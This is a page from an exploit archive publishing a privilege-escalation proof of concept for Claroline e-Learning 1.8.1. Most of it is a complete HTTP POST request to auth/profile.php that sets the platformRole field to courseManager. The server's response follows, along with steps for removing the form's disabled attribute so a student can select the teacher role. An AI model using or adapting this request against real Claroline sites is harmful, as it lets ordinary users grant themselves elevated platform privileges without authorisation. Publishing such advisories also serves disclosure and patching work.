Home / exploitsPDF  

Claroline e-Learning 1.8.1 Privilege Escalation Vulnerability

Posted on 17 August 2013

<pre>Claroline users can assign themselves their platform role, leading to possible privilege escalation
   
Description:
   
Due to insufficient permission checking in profile.php any user
can assign hem or her self to any organization by issueing a single http request
 
 
 #######################################################
 
 
http://%targetsite%/claroline1811/claroline/auth/profile.php
 
POST /claroline1811/claroline/auth/profile.php HTTP/1.1
Host: %targetsite%
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://%targetsite%/claroline1811/claroline/auth/profile.php
Cookie: javascriptEnabled=true; 7e3da37302f0c5887c5a23ec673c8fda=0mmhmtdunecvb0o9q34k340qd0; bd84f0e7e57f5bde1a0f3d525d0f3511=h0ifng3c6of9ets5hihsr7jgg5
Content-Type: multipart/form-data; boundary=---------------------------114782935826962
Content-Length: 1443
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;cmd&quot;
 
registration
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;claroFormId&quot;
 
520df680057be
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;csrf_token&quot;
 
0000token00000x0token000000token
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;uidToEdit&quot;
 
9
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;lastname&quot;
 
Tom
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;firstname&quot;
 
Sawyer
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;officialCode&quot;
 
TMSW
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;username&quot;
 
littletomsawyer
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;email&quot;
 
 
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;phone&quot;
 
 
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;skype&quot;
 
 
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;platformRole&quot;
 
courseManager
-----------------------------114782935826962
Content-Disposition: form-data; name=&quot;applyChange&quot;
 
OK
-----------------------------114782935826962--
 
HTTP/1.1 200 OK
Date: Fri, 16 Aug 2013 09:54:24 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze16
Expires: Thu, 19 Nov 1981 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2920
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
 
 
########################################################
   
 
!! PoC:
@ auth/profile.php change the ' &quot;disabled=&quot;true&quot; ' status of the button:
&lt;dl&gt;
            &lt;dt&gt;
                Platform role            &lt;/dt&gt;
            &lt;dd&gt;
                &lt;input type=&quot;radio&quot; checked=&quot;checked&quot; value=&quot;student&quot; id=&quot;student&quot; name=&quot;platformRole&quot;&gt;&lt;label for=&quot;student&quot;&gt; (student)&lt;/label&gt;&lt;br&gt;
                &lt;input type=&quot;radio&quot; disabled=&quot;disabled&quot; value=&quot;courseManager&quot; id=&quot;courseManager&quot; name=&quot;platformRole&quot;&gt;&lt;label for=&quot;courseManager&quot;&gt;(teacher)&lt;/label&gt;&lt;br&gt;
                 
             &lt;/dd&gt;
             
&lt;/dl&gt;
   
Systems affected:
   
Claroline 1.8.x
   
Vendor status :
   
Unknown
</pre>

 

TOP

Malware :

Exploits :